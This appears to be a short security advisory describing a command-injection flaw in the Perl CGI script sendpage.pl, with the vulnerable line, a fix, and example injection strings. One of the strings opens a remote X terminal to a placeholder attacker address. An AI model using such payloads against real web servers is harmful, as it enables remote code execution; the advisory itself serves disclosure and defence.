|
|
|
|
| |
| The sendpage.pl program reads in some input through standard HTML forms, does some work, and then pipes a string to a user-defined executable that will then send that information as a page (page as in the telecommunications type) to the intended recipient. A security vulnerability in the product allows attackers to execute arbitrary code. |
| |
Credit:
The information has been provided by Pedram Amini and John Imrie.
|
| |
The offending line of code that allows us to execute our own command is found on line 68.
68: { $ret=`/bin/echo \"$message\" | $pcmd`; }
Examining the script shows that aside from basic URL decoding (lines 30 and 31) no further parsing is done on $message. So what can we do with this? We can end the echo statement, run our own command, and then start a new "un-ended" echo statement to satisfy the remainder of the command line. In Essence:
test"; OUR COMMAND; echo "message
As an example go to the form page, choose a recipient, and enter the following as your message:
test"; touch /tmp/blah; echo "message
Assuming /tmp/blah didn't exist before, it should now. Spawning a shell with the permissions of the web server is as simple as:
test"; sh -c 'xterm -display ATACKER_IP:0.0 &'; echo "message
Fix:
To fix, simply filter out all "dangerous" characters: ,';"/`\%$#{}-&<>...
We prefer to keep things simple and remove all non-alphanumeric characters:
$message =~ s/[^A-Za-z0-9]//g;
|
|
|
|
|
